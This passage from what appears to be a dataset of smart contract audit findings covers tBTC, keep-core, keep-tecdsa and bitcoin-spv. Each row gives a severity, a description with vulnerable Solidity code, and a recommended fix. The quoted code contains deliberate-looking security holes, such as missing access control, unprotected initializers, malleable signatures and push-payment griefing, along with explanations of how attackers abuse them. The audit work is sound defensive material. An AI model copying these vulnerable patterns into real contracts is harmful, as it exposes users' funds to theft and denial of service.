\\_preimage);\\n require(\\_isFraud, ""Signature is not fraudulent"");\\n \\_d.logFraudDuringSetup();\\n\\n // If the funding timeout has elapsed, punish the funder too!\\n if (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n } else {\\n /\\* NB: This is reuse of the variable \\*/\\n \\_d.fundingProofTimerStart = block.timestamp;\\n \\_d.setFraudAwaitingBTCFundingProof();\\n }\\n}\\n```\\n\\n`purchaseSignerBondsAtAuction` pays out the funds\\n```\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n","For fraud proofs, it should be required that the reporter uses a commit/reveal scheme to lock in a proof in one block, and reveal the details in another.",,"```\\n/// @param \\_preimage The sha256 preimage of the digest\\nfunction provideECDSAFraudProof(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes memory \\_preimage\\n) public {\\n require(\\n !\\_d.inFunding() && !\\_d.inFundingFailure(),\\n ""Use provideFundingECDSAFraudProof instead""\\n );\\n require(\\n !\\_d.inSignerLiquidation(),\\n ""Signer liquidation already in progress""\\n );\\n require(!\\_d.inEndState(), ""Contract has halted"");\\n require(submitSignatureFraud(\\_d, \\_v, \\_r, \\_s, \\_signedDigest, \\_preimage), ""Signature is not fraud"");\\n startSignerFraudLiquidation(\\_d);\\n}\\n```\\n" +tbtc - Anyone can emit log events due to missing access control,high,"Access control for `DepositLog` is not implemented. `DepositLog` is inherited by `TBTCSystem` and its functionality is usually consumed by `Deposit` contracts to emit log events on `TBTCSystem`. Due to the missing access control, anyone can emit log events on `TBTCSystem`. Users, client-software or other components that rely on these events might be tricked into performing actions that were not authorized by the system.\\n```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\n",Log events are typically initiated by the Deposit contract. Make sure only Deposit contracts deployed by an approved factory can emit logs on TBTCSystem.,,```\\nfunction approvedToLog(address \\_caller) public pure returns (bool) {\\n /\\* TODO: auth via system \\*/\\n \\_caller;\\n return true;\\n}\\n```\\n +DKGResultVerification.verify unsafe packing in signed data,medium,"`DKGResultVerification.verify` allows the sender to arbitrarily move bytes between `groupPubKey` and misbehaved:\\n```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\n",Validate the expected length of both and add a salt between the two.,,"```\\nbytes32 resultHash = keccak256(abi.encodePacked(groupPubKey, misbehaved));\\n```\\n" +keep-core - Service contract callbacks can be abused to call into other contracts,medium,"`KeepRandomBeaconServiceImplV1` allows senders to specify an arbitrary method and contract that will receive a callback once the beacon generates a relay entry:\\n```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. ""relayEntryCallback(uint256)"".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n\\nOnce an operator contract receives the relay entry, it calls executeCallback:\\n```\\n/\\*\\*\\n \\* @dev Executes customer specified callback for the relay entry request.\\n \\* @param requestId Request id tracked internally by this contract.\\n \\* @param entry The generated random number.\\n \\* @return Address to receive callback surplus.\\n \\*/\\nfunction executeCallback(uint256 requestId, uint256 entry) public returns (address payable surplusRecipient) {\\n require(\\n \\_operatorContracts.contains(msg.sender),\\n ""Only authorized operator contract can call execute callback.""\\n );\\n\\n require(\\n \\_callbacks[requestId].callbackContract != address(0),\\n ""Callback contract not found""\\n );\\n\\n \\_callbacks[requestId].callbackContract.call(abi.encodeWithSignature(\\_callbacks[requestId].callbackMethod, entry));\\n\\n surplusRecipient = \\_callbacks[requestId].surplusRecipient;\\n delete \\_callbacks[requestId];\\n}\\n```\\n\\nArbitrary callbacks can be used to force the service contract to execute many functions within the keep contract system. Currently, the `KeepRandomBeaconOperator` includes an `onlyServiceContract` modifier:\\n```\\n/\\*\\*\\n \\* @dev Checks if sender is authorized.\\n \\*/\\nmodifier onlyServiceContract() {\\n require(\\n serviceContracts.contains(msg.sender),\\n ""Caller is not an authorized contract""\\n );\\n \\_;\\n}\\n```\\n\\nThe functions it protects cannot be targeted by the aforementioned service contract callbacks due to Solidity's `CALLDATASIZE` checking. However, the presence of the modifier suggests that the service contract is expected to be a permissioned actor within some contracts.","Stick to a constant callback method signature, rather than allowing users to submit an arbitrary string. An example is `__beaconCallback__(uint256)`.\\nConsider disallowing arbitrary callback destinations. Instead, rely on contracts making requests directly, and default the callback destination to `msg.sender`. Ensure the sender is not an EOA.",,"```\\n/\\*\\*\\n \\* @dev Creates a request to generate a new relay entry, which will include\\n \\* a random number (by signing the previous entry's random number).\\n \\* @param callbackContract Callback contract address. Callback is called once a new relay entry has been generated.\\n \\* @param callbackMethod Callback contract method signature. String representation of your method with a single\\n \\* uint256 input parameter i.e. ""relayEntryCallback(uint256)"".\\n \\* @param callbackGas Gas required for the callback.\\n \\* The customer needs to ensure they provide a sufficient callback gas\\n \\* to cover the gas fee of executing the callback. Any surplus is returned\\n \\* to the customer. If the callback gas amount turns to be not enough to\\n \\* execute the callback, callback execution is skipped.\\n \\* @return An uint256 representing uniquely generated relay request ID. It is also returned as part of the event.\\n \\*/\\nfunction requestRelayEntry(\\n address callbackContract,\\n string memory callbackMethod,\\n uint256 callbackGas\\n) public nonReentrant payable returns (uint256) {\\n```\\n" +tbtc - Disallow signatures with high-s values in DepositRedemption.provideRedemptionSignature,medium,"`DepositRedemption.provideRedemptionSignature` is used by signers to publish a signature that can be used to redeem a deposit on Bitcoin. The function accepts a signature s value in the upper half of the secp256k1 curve:\\n```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), ""Not currently awaiting a signature"");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n ""Invalid signature""\\n );\\n```\\n\\nAlthough `ecrecover` accepts signatures with these s values, they are no longer used in Bitcoin. As such, the signature will appear to be valid to the Ethereum smart contract, but will likely not be accepted on Bitcoin. If no users watching malleate the signature, the redemption process will likely enter a fee increase loop, incurring a cost on the deposit owner.","Ensure the passed-in s value is restricted to the lower half of the secp256k1 curve, as done in BondedECDSAKeep:\\n```\\n// Validate `s` value for a malleability concern described in EIP-2.\\n// Only signatures with `s` value in the lower half of the secp256k1\\n// curve's order are considered valid.\\nrequire(\\n uint256(\\_s) <=\\n 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0,\\n ""Malleable signature - s should be in the low half of secp256k1 curve's order""\\n);\\n```\\n",,"```\\nfunction provideRedemptionSignature(\\n DepositUtils.Deposit storage \\_d,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) public {\\n require(\\_d.inAwaitingWithdrawalSignature(), ""Not currently awaiting a signature"");\\n\\n // If we're outside of the signature window, we COULD punish signers here\\n // Instead, we consider this a no-harm-no-foul situation.\\n // The signers have not stolen funds. Most likely they've just inconvenienced someone\\n\\n // The signature must be valid on the pubkey\\n require(\\n \\_d.signerPubkey().checkSig(\\n \\_d.lastRequestedDigest,\\n \\_v, \\_r, \\_s\\n ),\\n ""Invalid signature""\\n );\\n```\\n" +Consistent use of SafeERC20 for external tokens,medium,"Use `SafeERC20` features to interact with potentially broken tokens used in the system. E.g. `TokenGrant.receiveApproval()` is using `safeTransferFrom` while other contracts aren't.\\n`TokenGrant.receiveApproval` using `safeTransferFrom`\\n```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n\\n`TokenStaking.receiveApproval` not using `safeTransferFrom` while `safeTransfer` is being used.\\n```\\ntoken.transferFrom(\\_from, address(this), \\_value);\\n```\\n\\n```\\ntoken.safeTransfer(owner, amount);\\n```\\n\\n```\\ntoken.transfer(tattletale, tattletaleReward);\\n```\\n\\n`distributeERC20ToMembers` not using `safeTransferFrom`\\n```\\ntoken.transferFrom(\\n msg.sender,\\n tokenStaking.magpieOf(members[i]),\\n dividend\\n);\\n```\\n",Consistently use `SafeERC20` to support potentially broken tokens external to the system.,,"```\\ntoken.safeTransferFrom(\\_from, address(this), \\_amount);\\n```\\n" +Initialize implementations for proxy contracts and protect initialization methods,medium,"It should be avoided that the implementation for proxy contracts can be initialized by third parties. This can be the case if the `initialize` function is unprotected. Since the implementation contract is not meant to be used directly without a proxy delegate-calling it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nChanging the proxies implementation (upgradeTo()) to a version that does not protect the initialization method may allow someone to front-run and initialize the contract if it is not done within the same transaction.\\n`KeepVendor` delegates to `KeepVendorImplV1`. The implementations initialization method is unprotected.\\n```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), ""Contract is already initialized."");\\n \\_initialized[""BondedECDSAKeepVendorImplV1""] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n\\n`KeepRandomBeaconServiceImplV1` and `KeepRandomBeaconServiceUpgradeExample`\\n```\\nfunction initialize(\\n uint256 priceFeedEstimate,\\n uint256 fluctuationMargin,\\n uint256 dkgContributionMargin,\\n uint256 withdrawalDelay,\\n address registry\\n)\\n public\\n{\\n require(!initialized(), ""Contract is already initialized."");\\n \\_initialized[""KeepRandomBeaconServiceImplV1""] = true;\\n \\_priceFeedEstimate = priceFeedEstimate;\\n \\_fluctuationMargin = fluctuationMargin;\\n \\_dkgContributionMargin = dkgContributionMargin;\\n \\_withdrawalDelay = withdrawalDelay;\\n \\_pendingWithdrawal = 0;\\n \\_previousEntry = \\_beaconSeed;\\n \\_registry = registry;\\n \\_baseCallbackGas = 18845;\\n}\\n```\\n\\n`Deposit` is deployed via `cloneFactory` delegating to a `masterDepositAddress` in `DepositFactory`. The `masterDepositAddress` (Deposit) might be left uninitialized.\\n```\\ncontract DepositFactoryAuthority {\\n\\n bool internal \\_initialized = false;\\n address internal \\_depositFactory;\\n\\n /// @notice Set the address of the System contract on contract initialization\\n function initialize(address \\_factory) public {\\n require(! \\_initialized, ""Factory can only be initialized once."");\\n\\n \\_depositFactory = \\_factory;\\n \\_initialized = true;\\n }\\n```\\n",Initialize unprotected implementation contracts in the implementation's constructor. Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.,,"```\\n/// @notice Initializes Keep Vendor contract implementation.\\n/// @param registryAddress Keep registry contract linked to this contract.\\nfunction initialize(\\n address registryAddress\\n)\\n public\\n{\\n require(!initialized(), ""Contract is already initialized."");\\n \\_initialized[""BondedECDSAKeepVendorImplV1""] = true;\\n registry = Registry(registryAddress);\\n}\\n```\\n" +"keep-tecdsa - If caller sends more than is contained in the signer subsidy pool, the value is burned",medium,"The signer subsidy pool in `BondedECDSAKeepFactory` tracks funds sent to the contract. Each time a keep is opened, the subsidy pool is intended to be distributed to the members of the new keep:\\n```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n\\nThe tracking around subsidy pool increases is inconsistent, and can lead to sent value being burned. In the case that `subsidyPool` contains less Ether than is sent in `msg.value`, `msg.value` is unused and remains in the contract. It may or may not be added to `subsidyPool`, depending on the return status of the random beacon:\\n```\\n(bool success, ) = address(randomBeacon).call.gas(400000).value(msg.value)(\\n abi.encodeWithSignature(\\n ""requestRelayEntry(address,string,uint256)"",\\n address(this),\\n ""setGroupSelectionSeed(uint256)"",\\n callbackGas\\n )\\n);\\nif (!success) {\\n subsidyPool += msg.value; // beacon is busy\\n}\\n```\\n","Rather than tracking the `subsidyPool` individually, simply distribute `this.balance` to each new keep's members.",,"```\\n// If subsidy pool is non-empty, distribute the value to signers but\\n// never distribute more than the payment for opening a keep.\\nuint256 signerSubsidy = subsidyPool < msg.value\\n ? subsidyPool\\n : msg.value;\\nif (signerSubsidy > 0) {\\n subsidyPool -= signerSubsidy;\\n keep.distributeETHToMembers.value(signerSubsidy)();\\n}\\n```\\n" +keep-core - TokenGrant and TokenStaking allow staking zero amount of tokens and front-running,medium,"Tokens are staked via the callback `receiveApproval()` which is normally invoked when calling `approveAndCall()`. The method is not restricting who can initiate the staking of tokens and relies on the fact that the token transfer to the `TokenStaking` contract is pre-approved by the owner, otherwise, the call would revert.\\nHowever, `receiveApproval()` allows the staking of a zero amount of tokens. The only check performed on the number of tokens transferred is, that the token holders balance covers the amount to be transferred. This check is both relatively weak - having enough balance does not imply that tokens are approved for transfer - and does not cover the fact that someone can call the method with a zero amount of tokens.\\nThis way someone could create an arbitrary number of operators staking no tokens at all. This passes the token balance check, `token.transferFrom()` will succeed and an operator struct with a zero stake and arbitrary values for `operator, from, magpie, authorizer` can be set. Finally, an event is emitted for a zero stake.\\nAn attacker could front-run calls to `receiveApproval` to block staking of a legitimate operator by creating a zero stake entry for the operator before she is able to. This vector might allow someone to permanently inconvenience an operator's address. To recover from this situation one could be forced to `cancelStake` terminating the zero stake struct in order to call the contract with the correct stake again.\\nThe same issue exists for `TokenGrant`.\\n```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, ""Token contract must be the same one linked to this contract."");\\n require(\\_value <= token.balanceOf(\\_from), ""Sender must have enough tokens."");\\n require(\\_extraData.length == 60, ""Stake delegation data must be provided."");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), ""Operator address is already in use."");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\n",Require tokens to be staked and explicitly disallow the zero amount of tokens case. The balance check can be removed.\\nNote: Consider checking the calls return value or calling the contract via `SafeERC20` to support potentially broken tokens that do not revert in error cases (token.transferFrom).,,"```\\n/\\*\\*\\n \\* @notice Receives approval of token transfer and stakes the approved amount.\\n \\* @dev Makes sure provided token contract is the same one linked to this contract.\\n \\* @param \\_from The owner of the tokens who approved them to transfer.\\n \\* @param \\_value Approved amount for the transfer and stake.\\n \\* @param \\_token Token contract address.\\n \\* @param \\_extraData Data for stake delegation. This byte array must have the\\n \\* following values concatenated: Magpie address (20 bytes) where the rewards for participation\\n \\* are sent, operator's (20 bytes) address, authorizer (20 bytes) address.\\n \\*/\\nfunction receiveApproval(address \\_from, uint256 \\_value, address \\_token, bytes memory \\_extraData) public {\\n require(ERC20Burnable(\\_token) == token, ""Token contract must be the same one linked to this contract."");\\n require(\\_value <= token.balanceOf(\\_from), ""Sender must have enough tokens."");\\n require(\\_extraData.length == 60, ""Stake delegation data must be provided."");\\n\\n address payable magpie = address(uint160(\\_extraData.toAddress(0)));\\n address operator = \\_extraData.toAddress(20);\\n require(operators[operator].owner == address(0), ""Operator address is already in use."");\\n address authorizer = \\_extraData.toAddress(40);\\n\\n // Transfer tokens to this contract.\\n token.transferFrom(\\_from, address(this), \\_value);\\n\\n operators[operator] = Operator(\\_value, block.number, 0, \\_from, magpie, authorizer);\\n ownerOperators[\\_from].push(operator);\\n\\n emit Staked(operator, \\_value);\\n}\\n```\\n" +tbtc - Inconsistency between increaseRedemptionFee and provideRedemptionProof may create un-provable redemptions,medium,"`DepositRedemption.increaseRedemptionFee` is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, ""Not an allowed fee step"");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`. Over a 24-hour period, `increaseRedemptionFee` could be called 6 times, increasing the fee to `initialRedemptionFee * 6`.\\nEventually, it is expected that a transaction will be submitted and mined. At this point, anyone can call `DepositRedemption.provideRedemptionProof`, finalizing the redemption process and rewarding the signers. However, `provideRedemptionProof` will fail if the transaction fee is too high:\\n```\\nrequire((\\_d.utxoSize().sub(\\_fundingOutputValue)) <= \\_d.initialRedemptionFee \\* 5, ""Fee unexpectedly very high"");\\n```\\n\\nIn the case that `increaseRedemptionFee` is called 6 times and the signers provide a signature for this transaction, the transaction can be submitted and mined but `provideRedemptionProof` for this will always fail. Eventually, a redemption proof timeout will trigger the deposit into liquidation and the signers will be punished.","Because it is difficult to say with certainty that a 5x fee increase will always ensure a transaction's redeemability, the upper bound on fee bumps should be removed from `provideRedemptionProof`.\\nThis should be implemented in tandem with https://github.com/ConsenSys/thesis-tbtc-audit-2020-01/issues/38, so that signers cannot provide a proof that bypasses `increaseRedemptionFee` flow to spend the highest fee possible.",,"```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n" +keep-tecdsa - keep cannot be closed if a members bond was seized or fully reassigned,medium,"A keep cannot be closed if the bonds have been completely reassigned or seized before, leaving at least one member with zero `lockedBonds`. In this case `closeKeep()` will throw in `freeMembersBonds()` because the requirement in `keepBonding.freeBond` is not satisfied anymore (lockedBonds[bondID] > 0). As a result of this, none of the potentially remaining bonds (reassign) are freed, the keep stays active even though it should be closed.\\n```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n ""Requested signing has not timed out yet""\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n\\n```\\n/// @notice Releases the bond and moves the bond value to the operator's\\n/// unbounded value pool.\\n/// @dev Function requires that caller is the holder of the bond which is\\n/// being released.\\n/// @param operator Address of the bonded operator.\\n/// @param referenceID Reference ID of the bond.\\nfunction freeBond(address operator, uint256 referenceID) public {\\n address holder = msg.sender;\\n bytes32 bondID = keccak256(\\n abi.encodePacked(operator, holder, referenceID)\\n );\\n\\n require(lockedBonds[bondID] > 0, ""Bond not found"");\\n\\n uint256 amount = lockedBonds[bondID];\\n lockedBonds[bondID] = 0;\\n unbondedValue[operator] = amount;\\n}\\n```\\n",Make sure the keep can be set to an end-state (closed/inactive) indicating its end-of-life even if the bond has been seized before. Avoid throwing an exception when freeing member bonds to avoid blocking the unlocking of bonds.,,"```\\n/// @notice Closes keep when owner decides that they no longer need it.\\n/// Releases bonds to the keep members. Keep can be closed only when\\n/// there is no signing in progress or requested signing process has timed out.\\n/// @dev The function can be called by the owner of the keep and only is the\\n/// keep has not been closed already.\\nfunction closeKeep() external onlyOwner onlyWhenActive {\\n require(\\n !isSigningInProgress() || hasSigningTimedOut(),\\n ""Requested signing has not timed out yet""\\n );\\n\\n isActive = false;\\n\\n freeMembersBonds();\\n\\n emit KeepClosed();\\n}\\n\\n/// @notice Returns bonds to the keep members.\\nfunction freeMembersBonds() internal {\\n for (uint256 i = 0; i < members.length; i++) {\\n keepBonding.freeBond(members[i], uint256(address(this)));\\n }\\n}\\n```\\n" +tbtc - provideFundingECDSAFraudProof attempts to burn non-existent funds,medium,"The funding flow was recently changed from requiring the funder to provide a bond that stays in the Deposit contract to forwarding the funds to the keep, paying for the keep setup.\\nSo at a high level, the funding bond was designed to ensure that funders had some minimum skin in the game, so that DoSing signers/the system was expensive. The upside was that we could refund it in happy paths. Now that we've realized that opening the keep itself will cost enough to prevent DoS, the concept of refunding goes away entirely. We definitely missed cleaning up the funder handling in provideFundingECDSAFraudProof though.\\n```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\n",Remove the line that attempts to punish the funder by burning the Deposit contract balance which is zero due to recent changes in how the payment provided with createNewDepositis handled.,,"```\\n// If the funding timeout has elapsed, punish the funder too!\\nif (block.timestamp > \\_d.fundingProofTimerStart + TBTCConstants.getFundingTimeout()) {\\n address(0).transfer(address(this).balance); // Burn it all down (fire emoji)\\n \\_d.setFailedSetup();\\n```\\n" +bitcoin-spv - Bitcoin output script length is not checked in wpkhSpendSighash Won't Fix,medium,"`CheckBitcoinSigs.wpkhSpendSighash` calculates the sighash of a Bitcoin transaction. Among its parameters, it accepts `bytes memory _outpoint`, which is a 36-byte UTXO id consisting of a 32-byte transaction hash and a 4-byte output index.\\nThe function in question should not accept an `_outpoint` that is not 36-bytes, but no length check is made:\\n```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n hex""1976a914"", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex""88ac""); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex""01000000"", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex""8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9"", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex""00000000"", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex""00000000"", // nLockTime\\n hex""01000000"" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\n",Check that `_outpoint.length` is 36.,,"```\\nfunction wpkhSpendSighash(\\n bytes memory \\_outpoint, // 36 byte UTXO id\\n bytes20 \\_inputPKH, // 20 byte hash160\\n bytes8 \\_inputValue, // 8-byte LE\\n bytes8 \\_outputValue, // 8-byte LE\\n bytes memory \\_outputScript // lenght-prefixed output script\\n) internal pure returns (bytes32) {\\n // Fixes elements to easily make a 1-in 1-out sighash digest\\n // Does not support timelocks\\n bytes memory \\_scriptCode = abi.encodePacked(\\n hex""1976a914"", // length, dup, hash160, pkh\\_length\\n \\_inputPKH,\\n hex""88ac""); // equal, checksig\\n bytes32 \\_hashOutputs = abi.encodePacked(\\n \\_outputValue, // 8-byte LE\\n \\_outputScript).hash256();\\n bytes memory \\_sighashPreimage = abi.encodePacked(\\n hex""01000000"", // version\\n \\_outpoint.hash256(), // hashPrevouts\\n hex""8cb9012517c817fead650287d61bdd9c68803b6bf9c64133dcab3e65b5a50cb9"", // hashSequence(00000000)\\n \\_outpoint, // outpoint\\n \\_scriptCode, // p2wpkh script code\\n \\_inputValue, // value of the input in 8-byte LE\\n hex""00000000"", // input nSequence\\n \\_hashOutputs, // hash of the single output\\n hex""00000000"", // nLockTime\\n hex""01000000"" // SIGHASH\\_ALL\\n );\\n return \\_sighashPreimage.hash256();\\n}\\n```\\n" +tbtc - liquidationInitiator can block purchaseSignerBondsAtAuction indefinitely,medium,"When reporting a fraudulent proof the deposits `liquidationInitiator` is set to the entity reporting and proofing the fraud. The deposit that is in a `*_liquidation_in_progress` state can be bought by anyone at an auction calling `purchaseSignerBondsAtAuction`.\\nInstead of receiving a share of the funds the `liquidationInitiator` can decide to intentionally reject the funds by raising an exception causing `initiator.transfer(contractEthBalance)` to throw, blocking the auction and forcing the liquidation to fail. The deposit will stay in one of the `*_liquidation_in_progress` states.\\n```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), ""No active auction"");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n require(\\_tbtcToken.balanceOf(msg.sender) >= lotSizeTbtc, ""Not enough TBTC to cover outstanding debt"");\\n\\n if(tdtHolder == \\_d.VendingMachine){\\n \\_tbtcToken.burnFrom(msg.sender, lotSizeTbtc); // burn minimal amount to cover size\\n }\\n else{\\n \\_tbtcToken.transferFrom(msg.sender, tdtHolder, lotSizeTbtc);\\n }\\n\\n // Distribute funds to auction buyer\\n uint256 \\_valueToDistribute = \\_d.auctionValue();\\n msg.sender.transfer(\\_valueToDistribute);\\n\\n // Send any TBTC left to the Fee Rebate Token holder\\n \\_d.distributeFeeRebate();\\n\\n // For fraud, pay remainder to the liquidation initiator.\\n // For non-fraud, split 50-50 between initiator and signers. if the transfer amount is 1,\\n // division will yield a 0 value which causes a revert; instead, \\n // we simply ignore such a tiny amount and leave some wei dust in escrow\\n uint256 contractEthBalance = address(this).balance;\\n address payable initiator = \\_d.liquidationInitiator;\\n\\n if (initiator == address(0)){\\n initiator = address(0xdead);\\n }\\n if (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n }\\n}\\n```\\n",Use a pull vs push funds pattern or use `address.send` instead of `address.transfer` which might leave some funds locked in the contract if it fails.,,"```\\n/// @notice Closes an auction and purchases the signer bonds. Payout to buyer, funder, then signers if not fraud\\n/// @dev For interface, reading auctionValue will give a past value. the current is better\\n/// @param \\_d deposit storage pointer\\nfunction purchaseSignerBondsAtAuction(DepositUtils.Deposit storage \\_d) public {\\n bool \\_wasFraud = \\_d.inFraudLiquidationInProgress();\\n require(\\_d.inSignerLiquidation(), ""No active auction"");\\n\\n \\_d.setLiquidated();\\n \\_d.logLiquidated();\\n\\n // send the TBTC to the TDT holder. If the TDT holder is the Vending Machine, burn it to maintain the peg.\\n address tdtHolder = \\_d.depositOwner();\\n\\n TBTCToken \\_tbtcToken = TBTCToken(\\_d.TBTCToken);\\n\\n uint256 lotSizeTbtc = \\_d.lotSizeTbtc();\\n 